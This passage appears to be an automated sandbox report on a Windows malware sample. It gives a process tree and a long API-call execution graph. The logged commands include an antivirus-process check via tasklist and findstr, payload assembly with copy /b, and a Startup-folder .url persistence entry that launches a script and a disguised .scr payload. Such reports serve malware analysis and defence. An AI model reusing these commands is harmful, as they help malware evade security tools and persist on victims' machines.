                                                Has elevated privileges:true
                                                Has administrator privileges:true
                                                Programmed in:C, C++ or other language
                                                Reputation:moderate
                                                Has exited:true

                                                Target ID:5
                                                Start time:20:07:26
                                                Start date:12/10/2024
                                                Path:C:\Windows\SysWOW64\tasklist.exe
                                                Wow64 process (32bit):true
                                                Commandline:tasklist
                                                Imagebase:0x990000
                                                File size:79'360 bytes
                                                MD5 hash:0A4448B31CE7F83CB7691A2657F330F1
                                                Has elevated privileges:true
                                                Has administrator privileges:true
                                                Programmed in:C, C++ or other language
                                                Reputation:moderate
                                                Has exited:true

                                                Target ID:6
                                                Start time:20:07:26
                                                Start date:12/10/2024
                                                Path:C:\Windows\SysWOW64\findstr.exe
                                                Wow64 process (32bit):true
                                                Commandline:findstr -I "avastui avgui bdservicehost nswscsvc sophoshealth"
                                                Imagebase:0x150000
                                                File size:29'696 bytes
                                                MD5 hash:F1D4BE0E99EC734376FDE474A8D4EA3E
                                                Has elevated privileges:true
                                                Has administrator privileges:true
                                                Programmed in:C, C++ or other language
                                                Reputation:moderate
                                                Has exited:true

                                                Target ID:7
                                                Start time:20:07:26
                                                Start date:12/10/2024
                                                Path:C:\Windows\SysWOW64\cmd.exe
                                                Wow64 process (32bit):true
                                                Commandline:cmd /c md 103495
                                                Imagebase:0x240000
                                                File size:236'544 bytes
                                                MD5 hash:D0FCE3AFA6AA1D58CE9FA336CC2B675B
                                                Has elevated privileges:true
                                                Has administrator privileges:true
                                                Programmed in:C, C++ or other language
                                                Reputation:high
                                                Has exited:true

                                                Target ID:8
                                                Start time:20:07:26
                                                Start date:12/10/2024
                                                Path:C:\Windows\SysWOW64\findstr.exe
                                                Wow64 process (32bit):true
                                                Commandline:findstr /V "aroundaccommodategroupseverything" Fine
                                                Imagebase:0x150000
                                                File size:29'696 bytes
                                                MD5 hash:F1D4BE0E99EC734376FDE474A8D4EA3E
                                                Has elevated privileges:true
                                                Has administrator privileges:true
                                                Programmed in:C, C++ or other language
                                                Reputation:moderate
                                                Has exited:true

                                                Target ID:9
                                                Start time:20:07:26
                                                Start date:12/10/2024
                                                Path:C:\Windows\SysWOW64\cmd.exe
                                                Wow64 process (32bit):true
                                                Commandline:cmd /c copy /b ..\Correct + ..\Transparent + ..\Barbie + ..\Gloves + ..\Latin + ..\Story + ..\Ski + ..\Appraisal n
                                                Imagebase:0x240000
                                                File size:236'544 bytes
                                                MD5 hash:D0FCE3AFA6AA1D58CE9FA336CC2B675B
                                                Has elevated privileges:true
                                                Has administrator privileges:true
                                                Programmed in:C, C++ or other language
                                                Reputation:high
                                                Has exited:true

                                                Target ID:10
                                                Start time:20:07:26
                                                Start date:12/10/2024
                                                Path:C:\Users\user\AppData\Local\Temp\103495\Powder.pif
                                                Wow64 process (32bit):true
                                                Commandline:Powder.pif n
                                                Imagebase:0xe00000
                                                File size:893'608 bytes
                                                MD5 hash:18CE19B57F43CE0A5AF149C96AECC685
                                                Has elevated privileges:true
                                                Has administrator privileges:true
                                                Programmed in:C, C++ or other language
                                                Antivirus matches:
                                                • Detection: 5%, ReversingLabs
                                                • Detection: 10%, Virustotal, Browse
                                                Reputation:moderate
                                                Has exited:false

                                                Target ID:11
                                                Start time:20:07:27
                                                Start date:12/10/2024
                                                Path:C:\Windows\SysWOW64\choice.exe
                                                Wow64 process (32bit):true
                                                Commandline:choice /d y /t 5
                                                Imagebase:0x310000
                                                File size:28'160 bytes
                                                MD5 hash:FCE0E41C87DC4ABBE976998AD26C27E4
                                                Has elevated privileges:true
                                                Has administrator privileges:true
                                                Programmed in:C, C++ or other language
                                                Has exited:true

                                                Target ID:12
                                                Start time:20:07:28
                                                Start date:12/10/2024
                                                Path:C:\Windows\SysWOW64\cmd.exe
                                                Wow64 process (32bit):true
                                                Commandline:cmd /k echo [InternetShortcut] > "C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\GuardianCryptoElite.url" & echo URL="C:\Users\user\AppData\Local\GuardianCrypto Systems Inc\GuardianCryptoElite.js" >> "C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\GuardianCryptoElite.url" & exit
                                                Imagebase:0x240000
                                                File size:236'544 bytes
                                                MD5 hash:D0FCE3AFA6AA1D58CE9FA336CC2B675B
                                                Has elevated privileges:false
                                                Has administrator privileges:false
                                                Programmed in:C, C++ or other language
                                                Has exited:true

                                                Target ID:13
                                                Start time:20:07:28
                                                Start date:12/10/2024
                                                Path:C:\Windows\System32\conhost.exe
                                                Wow64 process (32bit):false
                                                Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                Imagebase:0x7ff7699e0000
                                                File size:862'208 bytes
                                                MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                Has elevated privileges:false
                                                Has administrator privileges:false
                                                Programmed in:C, C++ or other language
                                                Has exited:true

                                                Target ID:15
                                                Start time:20:07:40
                                                Start date:12/10/2024
                                                Path:C:\Windows\System32\wscript.exe
                                                Wow64 process (32bit):false
                                                Commandline:"C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Local\GuardianCrypto Systems Inc\GuardianCryptoElite.js"
                                                Imagebase:0x7ff740f80000
                                                File size:170'496 bytes
                                                MD5 hash:A47CBE969EA935BDD3AB568BB126BC80
                                                Has elevated privileges:false
                                                Has administrator privileges:false
                                                Programmed in:C, C++ or other language
                                                Has exited:true

                                                Target ID:16
                                                Start time:20:07:41
                                                Start date:12/10/2024
                                                Path:C:\Users\user\AppData\Local\GuardianCrypto Systems Inc\GuardianCryptoElite.scr
                                                Wow64 process (32bit):true
                                                Commandline:"C:\Users\user\AppData\Local\GuardianCrypto Systems Inc\GuardianCryptoElite.scr" "C:\Users\user\AppData\Local\GuardianCrypto Systems Inc\O"
                                                Imagebase:0x8e0000
                                                File size:893'608 bytes
                                                MD5 hash:18CE19B57F43CE0A5AF149C96AECC685
                                                Has elevated privileges:false
                                                Has administrator privileges:false
                                                Programmed in:C, C++ or other language
                                                Antivirus matches:
                                                • Detection: 5%, ReversingLabs
                                                • Detection: 10%, Virustotal, Browse
                                                Has exited:false

                                                Reset < >

                                                  Execution Graph

                                                  Execution Coverage:17.7%
                                                  Dynamic/Decrypted Code Coverage:0%
                                                  Signature Coverage:20.7%
                                                  Total number of Nodes:1528
                                                  Total number of Limit Nodes:34
                                                  execution_graph 4343 402fc0 4344 401446 18 API calls 4343->4344 4345 402fc7 4344->4345 4346 403017 4345->4346 4347 40300a 4345->4347 4350 401a13 4345->4350 4348 406805 18 API calls 4346->4348 4349 401446 18 API calls 4347->4349 4348->4350 4349->4350 4351 4023c1 4352 40145c 18 API calls 4351->4352 4353 4023c8 4352->4353 4356 40726a 4353->4356 4359 406ed2 CreateFileW 4356->4359 4360 406f04 4359->4360 4361 406f1e ReadFile 4359->4361 4362 4062a3 11 API calls 4360->4362 4363 4023d6 4361->4363 4366 406f84 4361->4366 4362->4363 4364 4071e3 CloseHandle 4364->4363 4365 406f9b ReadFile lstrcpynA lstrcmpA 4365->4366 4367 406fe2 SetFilePointer ReadFile 4365->4367 4366->4363 4366->4364 4366->4365 4370 406fdd 4366->4370 4367->4364 4368 4070a8 ReadFile 4367->4368 4369 407138 4368->4369 4369->4368 4369->4370 4371 40715f SetFilePointer GlobalAlloc ReadFile 4369->4371 4370->4364 4372 4071a3 4371->4372 4373 4071bf lstrcpynW GlobalFree 4371->4373 4372->4372 4372->4373 4373->4364 4374 401cc3 4375 40145c 18 API calls 4374->4375 4376 401cca lstrlenW 4375->4376 4377 4030dc 4376->4377 4378 4030e3 4377->4378 4380 405f51 wsprintfW 4377->4380 4380->4378 4395 401c46 4396 40145c 18 API calls 4395->4396 4397 401c4c 4396->4397 4398 4062a3 11 API calls 4397->4398 4399 401c59 4398->4399 4400 406c9b 81 API calls 4399->4400 4401 401c64 4400->4401 4402 403049 4403 401446 18 API calls 4402->4403 4406 403050 4403->4406 4404 406805 18 API calls 4405 401a13 4404->4405 4406->4404 4406->4405 4407 40204a 4408 401446 18 API calls 4407->4408 4409 402051 IsWindow 4408->4409 4410 4018d3 4409->4410 4411 40324c 4412 403277 4411->4412 4413 40325e SetTimer 4411->4413 4414 4032cc 4412->4414 4415 403291 MulDiv wsprintfW SetWindowTextW SetDlgItemTextW 4412->4415 4413->4412 4415->4414 4416 4048cc 4417 4048f1 4416->4417 4418 4048da 4416->4418 4420 4048ff IsWindowVisible 4417->4420 4424 404916 4417->4424 4419 4048e0 4418->4419 4434 40495a 4418->4434 4421 403daf SendMessageW 4419->4421 4423 40490c 4420->4423 4420->4434 4425 4048ea 4421->4425 4422 404960 CallWindowProcW 4422->4425 4435 40484e SendMessageW 4423->4435 4424->4422 4440 406009 lstrcpynW 4424->4440 4428 404945 4441 405f51 wsprintfW 4428->4441 4430 40494c 4431 40141d 80 API calls 4430->4431 4432 404953 4431->4432 4442 406009 lstrcpynW 4432->4442 4434->4422 4436 404871 GetMessagePos ScreenToClient SendMessageW 4435->4436 4437 4048ab SendMessageW 4435->4437 4438 4048a3 4436->4438 4439 4048a8 4436->4439 4437->4438 4438->4424 4439->4437 4440->4428 4441->4430 4442->4434 4443 4022cc 4444 40145c 18 API calls 4443->4444 4445 4022d3 4444->4445 4446 4062d5 2 API calls 4445->4446 4447 4022d9 4446->4447 4448 4022e8 4447->4448 4452 405f51 wsprintfW 4447->4452 4451 4030e3 4448->4451 4453 405f51 wsprintfW 4448->4453 4452->4448 4453->4451 4223 4050cd 4224 405295 4223->4224 4225 4050ee GetDlgItem GetDlgItem GetDlgItem 4223->4225 4226 4052c6 4224->4226 4227 40529e GetDlgItem CreateThread CloseHandle 4224->4227 4272 403d98 SendMessageW 4225->4272 4229 4052f4 4226->4229 4231 4052e0 ShowWindow ShowWindow 4226->4231 4232 405316 4226->4232 4227->4226 4275 405047 83 API calls 4227->4275 4233 405352 4229->4233 4235 405305 4229->4235 4236 40532b ShowWindow 4229->4236 4230 405162 4243 406805 18 API calls 4230->4243 4274 403d98 SendMessageW 4231->4274 4237 403dca 8 API calls 4232->4237 4233->4232 4238 40535d SendMessageW 4233->4238 4239 403d18 SendMessageW 4235->4239 4241 40534b 4236->4241 4242 40533d 4236->4242 4240 40528e 4237->4240 4238->4240 4245 405376 CreatePopupMenu 4238->4245 4239->4232 4244 403d18 SendMessageW 4241->4244 4246 404f72 25 API calls 4242->4246 4247 405181 4243->4247 4244->4233 4248 406805 18 API calls 4245->4248 4246->4241 4249 4062a3 11 API calls 4247->4249 4251 405386 AppendMenuW 4248->4251 4250 40518c GetClientRect GetSystemMetrics SendMessageW SendMessageW 4249->4250 4252 4051f3 4250->4252 4253 4051d7 SendMessageW SendMessageW 4250->4253 4254 405399 GetWindowRect 4251->4254 4255 4053ac 4251->4255 4256 405206 4252->4256 4257 4051f8 SendMessageW 4252->4257 4253->4252 4258 4053b3 TrackPopupMenu 4254->4258 4255->4258 4259 403d3f 19 API calls 4256->4259 4257->4256 4258->4240 4260 4053d1 4258->4260 4261 405216 4259->4261 4262 4053ed SendMessageW 4260->4262 4263 405253 GetDlgItem SendMessageW 4261->4263 4264 40521f ShowWindow 4261->4264 4262->4262 4265 40540a OpenClipboard EmptyClipboard GlobalAlloc GlobalLock 4262->4265 4263->4240 4268 405276 SendMessageW SendMessageW 4263->4268 4266 405242 4264->4266 4267 405235 ShowWindow 4264->4267 4269 40542f SendMessageW 4265->4269 4273 403d98 SendMessageW 4266->4273 4267->4266 4268->4240 4269->4269 4270 40545a GlobalUnlock SetClipboardData CloseClipboard 4269->4270 4270->4240 4272->4230 4273->4263 4274->4229 4454 4030cf 4455 40145c 18 API calls 4454->4455 4456 4030d6 4455->4456 4458 4030dc 4456->4458 4461 4063ac GlobalAlloc lstrlenW 4456->4461 4459 4030e3 4458->4459 4488 405f51 wsprintfW 4458->4488 4462 4063e2 4461->4462 4463 406434 4461->4463 4464 40640f GetVersionExW 4462->4464 4489 40602b CharUpperW 4462->4489 4463->4458 4464->4463 4465 40643e 4464->4465 4466 406464 LoadLibraryA 4465->4466 4467 40644d 4465->4467 4466->4463 4470 406482 GetProcAddress GetProcAddress GetProcAddress 4466->4470 4467->4463 4469 406585 GlobalFree 4467->4469 4471 40659b LoadLibraryA 4469->4471 4472 4066dd FreeLibrary 4469->4472 4475 4064aa 4470->4475 4478 4065f5 4470->4478 4471->4463 4474 4065b5 GetProcAddress GetProcAddress GetProcAddress GetProcAddress GetProcAddress 4471->4474 4472->4463 4473 406651 FreeLibrary 4482 40662a 4473->4482 4474->4478 4476 4064ce FreeLibrary GlobalFree 4475->4476 4475->4478 4484 4064ea 4475->4484 4476->4463 4477 4066ea 4480 4066ef CloseHandle FreeLibrary 4477->4480 4478->4473 4478->4482 4479 4064fc lstrcpyW OpenProcess 4481 40654f CloseHandle CharUpperW lstrcmpW 4479->4481 4479->4484 4483 406704 CloseHandle 4480->4483 4481->4478 4481->4484 4482->4477 4485 406685 lstrcmpW 4482->4485 4486 4066b6 CloseHandle 4482->4486 4487 4066d4 CloseHandle 4482->4487 4483->4480 4484->4469 4484->4479 4484->4481 4485->4482 4485->4483 4486->4482 4487->4472 4488->4459 4489->4462 4490 407752 4494 407344 4490->4494 4491 407c6d 4492 4073c2 GlobalFree 4493 4073cb GlobalAlloc 4492->4493 4493->4491 4493->4494 4494->4491 4494->4492 4494->4493 4494->4494 4495 407443 GlobalAlloc 4494->4495 4496 40743a GlobalFree 4494->4496 4495->4491 4495->4494 4496->4495 4497 401dd3 4498 401446 18 API calls 4497->4498 4499 401dda 4498->4499 4500 401446 18 API calls 4499->4500 4501 4018d3 4500->4501 4509 402e55 4510 40145c 18 API calls 4509->4510 4511 402e63 4510->4511 4512 402e79 4511->4512 4513 40145c 18 API calls 4511->4513 4514 405e30 2 API calls 4512->4514 4513->4512 4515 402e7f 4514->4515 4539 405e50 GetFileAttributesW CreateFileW 4515->4539 4517 402e8c 4518 402f35 4517->4518 4519 402e98 GlobalAlloc 4517->4519 4522 4062a3 11 API calls 4518->4522 4520 402eb1 4519->4520 4521 402f2c CloseHandle 4519->4521 4540 403368 SetFilePointer 4520->4540 4521->4518 4524 402f45 4522->4524 4526 402f50 DeleteFileW 4524->4526 4527 402f63 4524->4527 4525 402eb7 4529 403336 ReadFile 4525->4529 4526->4527 4541 401435 4527->4541 4530 402ec0 GlobalAlloc 4529->4530 4531 402ed0 4530->4531 4532 402f04 WriteFile GlobalFree 4530->4532 4533 40337f 37 API calls 4531->4533 4534 40337f 37 API calls 4532->4534 4538 402edd 4533->4538 4535 402f29 4534->4535 4535->4521 4537 402efb GlobalFree 4537->4532 4538->4537 4539->4517 4540->4525 4542 404f72 25 API calls 4541->4542 4543 401443 4542->4543 4544 401cd5 4545 401446 18 API calls 4544->4545 4546 401cdd 4545->4546 4547 401446 18 API calls 4546->4547 4548 401ce8 4547->4548 4549 40145c 18 API calls 4548->4549 4550 401cf1 4549->4550 4551 401d07 lstrlenW 4550->4551 4552 401d43 4550->4552 4553 401d11 4551->4553 4553->4552 4557 406009 lstrcpynW 4553->4557 4555 401d2c 4555->4552 4556 401d39 lstrlenW 4555->4556 4556->4552 4557->4555 4558 403cd6 4559 403ce1 4558->4559 4560 403ce5 4559->4560 4561 403ce8 GlobalAlloc 4559->4561 4561->4560 4562 402cd7 4563 401446 18 API calls 4562->4563 4566 402c64 4563->4566 4564 402d99 4565 402d17 ReadFile 4565->4566 4566->4562 4566->4564 4566->4565 4567 402dd8 4568 402ddf 4567->4568 4569 4030e3 4567->4569 4570 402de5 FindClose 4568->4570 4570->4569 4571 401d5c 4572 40145c 18 API calls 4571->4572 4573 401d63 4572->4573 4574 40145c 18 API calls 4573->4574 4575 401d6c 4574->4575 4576 401d73 lstrcmpiW 4575->4576 4577 401d86 lstrcmpW 4575->4577 4578 401d79 4576->4578 4577->4578 4579 401c99 4577->4579 4578->4577 4578->4579 4281 407c5f 4282 407344 4281->4282 4283 4073c2 GlobalFree 4282->4283 4284 4073cb GlobalAlloc 4282->4284 4285 407c6d 4282->4285 4286 407443 GlobalAlloc 4282->4286 4287 40743a GlobalFree 4282->4287 4283->4284 4284->4282 4284->4285 4286->4282 4286->4285 4287->4286 4580 404363 4581 404373 4580->4581 4582 40439c 4580->4582 4584 403d3f 19 API calls 4581->4584 4583 403dca 8 API calls 4582->4583 4585 4043a8 4583->4585 4586 404380 SetDlgItemTextW 4584->4586 4586->4582 4587 4027e3 4588 4027e9 4587->4588 4589 4027f2 4588->4589 4590 402836 4588->4590 4603 401553 4589->4603 4591 40145c 18 API calls 4590->4591 4593 40283d 4591->4593 4595 4062a3 11 API calls 4593->4595 4594 4027f9 4596 40145c 18 API calls 4594->4596 4601 401a13 4594->4601 4597 40284d 4595->4597 4598 40280a RegDeleteValueW 4596->4598 4607 40149d RegOpenKeyExW 4597->4607 4599 4062a3 11 API calls 4598->4599 4602 40282a RegCloseKey 4599->4602 4602->4601 4604 401563 4603->4604 4605 40145c 18 API calls 4604->4605 4606 401589 RegOpenKeyExW 4605->4606 4606->4594 4613 401515 4607->4613 4615 4014c9 4607->4615 4608 4014ef RegEnumKeyW 4609 401501 RegCloseKey 4608->4609 4608->4615 4610 4062fc 3 API calls 4609->4610 4612 401511 4610->4612 4611 401526 RegCloseKey 4611->4613 4612->4613 4616 401541 RegDeleteKeyW 4612->4616 4613->4601 4614 40149d 3 API calls 4614->4615 4615->4608 4615->4609 4615->4611 4615->4614 4616->4613 4617 403f64 4618 403f90 4617->4618 4619 403f74 4617->4619 4621 403fc3 4618->4621 4622 403f96 SHGetPathFromIDListW 4618->4622 4628 405c84 GetDlgItemTextW 4619->4628 4624 403fad SendMessageW 4622->4624 4625 403fa6 4622->4625 4623 403f81 SendMessageW 4623->4618 4624->4621 4626 40141d 80 API calls 4625->4626 4626->4624 4628->4623 4629 402ae4 4630 402aeb 4629->4630 4631 4030e3 4629->4631 4632 402af2 CloseHandle 4630->4632 4632->4631 4633 402065 4634 401446 18 API calls 4633->4634 4635 40206d 4634->4635 4636 401446 18 API calls 4635->4636 4637 402076 GetDlgItem 4636->4637 4638 4030dc 4637->4638 4639 4030e3 4638->4639 4641 405f51 wsprintfW 4638->4641 4641->4639 4642 402665 4643 40145c 18 API calls 4642->4643 4644 40266b 4643->4644 4645 40145c 18 API calls 4644->4645 4646 402674 4645->4646 4647 40145c 18 API calls 4646->4647 4648 40267d 4647->4648 4649 4062a3 11 API calls 4648->4649 4650 40268c 4649->4650 4651 4062d5 2 API calls 4650->4651 4652 402695 4651->4652 4653 4026a6 lstrlenW lstrlenW 4652->4653 4654 404f72 25 API calls 4652->4654 4657 4030e3 4652->4657 4655 404f72 25 API calls 4653->4655 4654->4652 4656 4026e8 SHFileOperationW 4655->4656 4656->4652 4656->4657 4665 401c69 4666 40145c 18 API calls 4665->4666 4667 401c70 4666->4667 4668 4062a3 11 API calls 4667->4668 4669 401c80 4668->4669 4670 405ca0 MessageBoxIndirectW 4669->4670 4671 401a13 4670->4671 4679 402f6e 4680 402f72 4679->4680 4681 402fae 4679->4681 4682 4062a3 11 API calls 4680->4682 4683 40145c 18 API calls 4681->4683 4684 402f7d 4682->4684 4689 402f9d 4683->4689 4685 4062a3 11 API calls 4684->4685 4686 402f90 4685->4686 4687 402fa2 4686->4687 4688 402f98 4686->4688 4691 4060e7 9 API calls 4687->4691 4690 403e74 5 API calls 4688->4690 4690->4689 4691->4689 4692 4023f0 4693 402403 4692->4693 4694 4024da 4692->4694 4695 40145c 18 API calls 4693->4695 4696 404f72 25 API calls 4694->4696 4697 40240a 4695->4697 4702 4024f1 4696->4702 4698 40145c 18 API calls 4697->4698 4699 402413 4698->4699 4700 402429 LoadLibraryExW 4699->4700 4701 40241b GetModuleHandleW 4699->4701 4703 40243e 4700->4703 4704 4024ce 4700->4704 4701->4700 4701->4703 4716 406365 GlobalAlloc WideCharToMultiByte 4703->4716 4705 404f72 25 API calls 4704->4705 4705->4694 4707 402449 4708 40248c 4707->4708 4709 40244f 4707->4709 4710 404f72 25 API calls 4708->4710 4712 401435 25 API calls 4709->4712 4714 40245f 4709->4714 4711 402496 4710->4711 4713 4062a3 11 API calls 4711->4713 4712->4714 4713->4714 4714->4702 4715 4024c0 FreeLibrary 4714->4715 4715->4702 4717 406390 GetProcAddress 4716->4717 4718 40639d GlobalFree 4716->4718 4717->4718 4718->4707 4719 402df3 4720 402dfa 4719->4720 4722 4019ec 4719->4722 4721 402e07 FindNextFileW 4720->4721 4721->4722 4723 402e16 4721->4723 4725 406009 lstrcpynW 4723->4725 4725->4722 4078 402175 4079 401446 18 API calls 4078->4079 4080 40217c 4079->4080 4081 401446 18 API calls 4080->4081 4082 402186 4081->4082 4083 4062a3 11 API calls 4082->4083 4087 402197 4082->4087 4083->4087 4084 4021aa EnableWindow 4086 4030e3 4084->4086 4085 40219f ShowWindow 4085->4086 4087->4084 4087->4085 4733 404077 4734 404081 4733->4734 4735 404084 lstrcpynW lstrlenW 4733->4735 4734->4735 4104 405479 4105 405491 4104->4105 4106 4055cd 4104->4106 4105->4106 4107 40549d 4105->4107 4108 40561e 4106->4108 4109 4055de GetDlgItem GetDlgItem 4106->4109 4110 4054a8 SetWindowPos 4107->4110 4111 4054bb 4107->4111 4113 405678 4108->4113 4121 40139d 80 API calls 4108->4121 4112 403d3f 19 API calls 4109->4112 4110->4111 4115 4054c0 ShowWindow 4111->4115 4116 4054d8 4111->4116 4117 405608 SetClassLongW 4112->4117 4114 403daf SendMessageW 4113->4114 4134 4055c8 4113->4134 4144 40568a 4114->4144 4115->4116 4118 4054e0 DestroyWindow 4116->4118 4119 4054fa 4116->4119 4120 40141d 80 API calls 4117->4120 4173 4058dc 4118->4173 4122 405510 4119->4122 4123 4054ff SetWindowLongW 4119->4123 4120->4108 4124 405650 4121->4124 4127 4055b9 4122->4127 4128 40551c GetDlgItem 4122->4128 4123->4134 4124->4113 4129 405654 SendMessageW 4124->4129 4125 40141d 80 API calls 4125->4144 4126 4058de DestroyWindow KiUserCallbackDispatcher 4126->4173 4183 403dca 4127->4183 4132 40554c 4128->4132 4133 40552f SendMessageW IsWindowEnabled 4128->4133 4129->4134 4131 40590d ShowWindow 4131->4134 4136 405559 4132->4136 4137 4055a0 SendMessageW 4132->4137 4138 40556c 4132->4138 4147 405551 4132->4147 4133->4132 4133->4134 4135 406805 18 API calls 4135->4144 4136->4137 4136->4147 4137->4127 4141 405574 4138->4141 4142 405589 4138->4142 4140 403d3f 19 API calls 4140->4144 4145 40141d 80 API calls 4141->4145 4146 40141d 80 API calls 4142->4146 4143 405587 4143->4127 4144->4125 4144->4126 4144->4134 4144->4135 4144->4140 4164 40581e DestroyWindow 4144->4164 4174 403d3f 4144->4174 4145->4147 4148 405590 4146->4148 4180 403d18 4147->4180 4148->4127 4148->4147 4150 405705 GetDlgItem 4151 405723 ShowWindow KiUserCallbackDispatcher 4150->4151 4152 40571a 4150->4152 4177 403d85 KiUserCallbackDispatcher 4151->4177 4152->4151 4154 40574d EnableWindow 4157 405761 4154->4157 4155 405766 GetSystemMenu EnableMenuItem SendMessageW 4156 405796 SendMessageW 4155->4156 4155->4157 4156->4157 4157->4155 4178 403d98 SendMessageW 4157->4178 4179 406009 lstrcpynW 4157->4179 4160 4057c4 lstrlenW 4161 406805 18 API calls 4160->4161 4162 4057da SetWindowTextW 4161->4162 4163 40139d 80 API calls 4162->4163 4163->4144 4165 405838 CreateDialogParamW 4164->4165 4164->4173 4166 40586b 4165->4166 4165->4173 4167 403d3f 19 API calls 4166->4167 4168 405876 GetDlgItem GetWindowRect ScreenToClient SetWindowPos 4167->4168 4169 40139d 80 API calls 4168->4169 4170 4058bc 4169->4170 4170->4134 4171 4058c4 ShowWindow 4170->4171 4172 403daf SendMessageW 4171->4172 4172->4173 4173->4131 4173->4134 4175 406805 18 API calls 4174->4175 4176 403d4a SetDlgItemTextW 4175->4176 4176->4150 4177->4154 4178->4157 4179->4160 4181 403d25 SendMessageW 4180->4181 4182 403d1f 4180->4182 4181->4143 4182->4181 4184 403ddf GetWindowLongW 4183->4184 4194 403e68 4183->4194 4185 403df0 4184->4185 4184->4194 4186 403e02 4185->4186 4187 403dff GetSysColor 4185->4187 4188 403e12 SetBkMode 4186->4188 4189 403e08 SetTextColor 4186->4189 4187->4186 4190 403e30 4188->4190 4191 403e2a GetSysColor 4188->4191 4189->4188 4192 403e41 4190->4192 4193 403e37 SetBkColor 4190->4193 4191->4190 4192->4194 4195 403e54 DeleteObject 4192->4195 4196 403e5b CreateBrushIndirect 4192->4196 4193->4192 4194->4134 4195->4196 4196->4194 4736 4020f9 GetDC GetDeviceCaps 4737 401446 18 API calls 4736->4737 4738 402116 MulDiv 4737->4738 4739 401446 18 API calls 4738->4739 4740 40212c 4739->4740 4741 406805 18 API calls 4740->4741 4742 402165 CreateFontIndirectW 4741->4742 4743 4030dc 4742->4743 4744 4030e3 4743->4744 4746 405f51 wsprintfW 4743->4746 4746->4744 4747 4024fb 4748 40145c 18 API calls 4747->4748 4749 402502 4748->4749 4750 40145c 18 API calls 4749->4750 4751 40250c 4750->4751 4752 40145c 18 API calls 4751->4752 4753 402515 4752->4753 4754 40145c 18 API calls 4753->4754 4755 40251f 4754->4755 4756 40145c 18 API calls 4755->4756 4757 402529 4756->4757 4758 40253d 4757->4758 4759 40145c 18 API calls 4757->4759 4760 4062a3 11 API calls 4758->4760 4759->4758 4761 40256a CoCreateInstance 4760->4761 4762 40258c 4761->4762 4763 40497c GetDlgItem GetDlgItem 4764 4049d2 7 API calls 4763->4764 4769 404bea 4763->4769 4765 404a76 DeleteObject 4764->4765 4766 404a6a SendMessageW 4764->4766 4767 404a81 4765->4767 4766->4765 4770 404ab8 4767->4770 4772 406805 18 API calls 4767->4772 4768 404ccf 4771 404d74 4768->4771 4776 404bdd 4768->4776 4781 404d1e SendMessageW 4768->4781 4769->4768 4779 40484e 5 API calls 4769->4779 4792 404c5a 4769->4792 4775 403d3f 19 API calls 4770->4775 4773 404d89 4771->4773 4774 404d7d SendMessageW 4771->4774 4778 404a9a SendMessageW SendMessageW 4772->4778 4783 404da2 4773->4783 4784 404d9b ImageList_Destroy 4773->4784 4794 404db2 4773->4794 4774->4773 4780 404acc 4775->4780 4782 403dca 8 API calls 4776->4782 4777 404cc1 SendMessageW 4777->4768 4778->4767 4779->4792 4785 403d3f 19 API calls 4780->4785 4781->4776 4787 404d33 SendMessageW 4781->4787 4788 404f6b 4782->4788 4789 404dab GlobalFree 4783->4789 4783->4794 4784->4783 4790 404add 4785->4790 4786 404f1c 4786->4776 4795 404f31 ShowWindow GetDlgItem ShowWindow 4786->4795 4791 404d46 4787->4791 4789->4794 4793 404baa GetWindowLongW SetWindowLongW 4790->4793 4802 404ba4 4790->4802 4805 404b39 SendMessageW 4790->4805 4806 404b67 SendMessageW 4790->4806 4807 404b7b SendMessageW 4790->4807 4801 404d57 SendMessageW 4791->4801 4792->4768 4792->4777 4796 404bc4 4793->4796 4794->4786 4797 404de4 4794->4797 4800 40141d 80 API calls 4794->4800 4795->4776 4798 404be2 4796->4798 4799 404bca ShowWindow 4796->4799 4810 404e12 SendMessageW 4797->4810 4813 404e28 4797->4813 4815 403d98 SendMessageW 4798->4815 4814 403d98 SendMessageW 4799->4814 4800->4797 4801->4771 4802->4793 4802->4796 4805->4790 4806->4790 4807->4790 4808 404ef3 InvalidateRect 4808->4786 4809 404f09 4808->4809 4816 4043ad 4809->4816 4810->4813 4812 404ea1 SendMessageW SendMessageW 4812->4813 4813->4808 4813->4812 4814->4776 4815->4769 4817 4043cd 4816->4817 4818 406805 18 API calls 4817->4818 4819 40440d 4818->4819 4820 406805 18 API calls 4819->4820 4821 404418 4820->4821 4822 406805 18 API calls 4821->4822 4823 404428 lstrlenW wsprintfW SetDlgItemTextW 4822->4823 4823->4786 4824 4026fc 4825 401ee4 4824->4825 4827 402708 4824->4827 4825->4824 4826 406805 18 API calls 4825->4826 4826->4825 4276 4019fd 4277 40145c 18 API calls 4276->4277 4278 401a04 4277->4278 4279 405e7f 2 API calls 4278->4279 4280 401a0b 4279->4280 4828 4022fd 4829 40145c 18 API calls 4828->4829 4830 402304 GetFileVersionInfoSizeW 4829->4830 4831 40232b GlobalAlloc 4830->4831 4835 4030e3 4830->4835 4832 40233f GetFileVersionInfoW 4831->4832 4831->4835 4833 402350 VerQueryValueW 4832->4833 4834 402381 GlobalFree 4832->4834 4833->4834 4837 402369 4833->4837 4834->4835 4841 405f51 wsprintfW 4837->4841 4839 402375 4842 405f51 wsprintfW 4839->4842 4841->4839 4842->4834 4843 402afd 4844 40145c 18 API calls 4843->4844 4845 402b04 4844->4845 4850 405e50 GetFileAttributesW CreateFileW 4845->4850 4847 402b10 4848 4030e3 4847->4848 4851 405f51 wsprintfW 4847->4851 4850->4847 4851->4848 4852 4029ff 4853 401553 19 API calls 4852->4853 4854 402a09 4853->4854 4855 40145c 18 API calls 4854->4855 4856 402a12 4855->4856 4857 402a1f RegQueryValueExW 4856->4857 4859 401a13 4856->4859 4858 402a3f 4857->4858 4862 402a45 4857->4862 4858->4862 4863 405f51 wsprintfW 4858->4863 4861 4029e4 RegCloseKey 4861->4859 4862->4859 4862->4861 4863->4862 4864 401000 4865 401037 BeginPaint GetClientRect 4864->4865 4866 40100c DefWindowProcW 4864->4866 4868 4010fc 4865->4868 4869 401182 4866->4869 4870 401073 CreateBrushIndirect FillRect DeleteObject 4868->4870 4871 401105 4868->4871 4870->4868 4872 401170 EndPaint 4871->4872 4873 40110b CreateFontIndirectW 4871->4873 4872->4869 4873->4872 4874 40111b 6 API calls 4873->4874 4874->4872 4875 401f80 4876 401446 18 API calls 4875->4876 4877 401f88 4876->4877 4878 401446 18 API calls 4877->4878 4879 401f93 4878->4879 4880 401fa3 4879->4880 